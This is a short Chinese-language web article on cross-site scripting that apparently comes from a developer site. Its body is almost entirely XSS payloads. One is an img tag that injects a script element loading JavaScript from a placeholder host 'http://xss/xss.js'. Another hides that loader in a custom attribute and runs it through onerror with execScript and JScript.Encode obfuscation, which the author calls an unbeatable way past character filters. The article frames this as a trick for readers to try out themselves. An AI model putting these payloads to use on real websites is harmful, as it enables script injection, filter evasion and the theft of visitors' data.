当前位置: 代码网 > 服务器>网络安全>企业安全 > 教你如何在XSS中再插JS

教你如何在XSS中再插JS

2008年10月08日 企业安全 我要评论
教你如何在XSS中再插JS <img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>字符过... 08-10-08
<img src="javascript:try{var s=document.createelement('script');s.src='http://xss/xss.js';document.body.appendchild(s);}catch(e){}"></img> 字符过滤怎么办?用encode加密后就无敌了~ 未加密前:
<img src='#' xss="try{var s=document.createelement('script');s.src='http://xss/xss.js';document.body.appendchild(s);}catch(e){}" onerror="execscript(decodeuri(this.xss),'jscript.encode');" > 加密后:
<img src='#' xss="#@~^bqaaaa==omx`7lmp/{nk^es uycm.nmy as s xdcv/1dbwobbikrdd1xb4yo2=zzpjuzp?u n/vpnkmes or(w[xcl22xn;4k^n`kbi81ldm4`nbp8xccaaa==^#~@ " onerror="execscript(decodeuri(this.xss),'jscript.encode');" > 嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeuri处理一次encode加密后的代码
(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
最近更新的文章
推荐阅读
大家感兴趣的文章
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com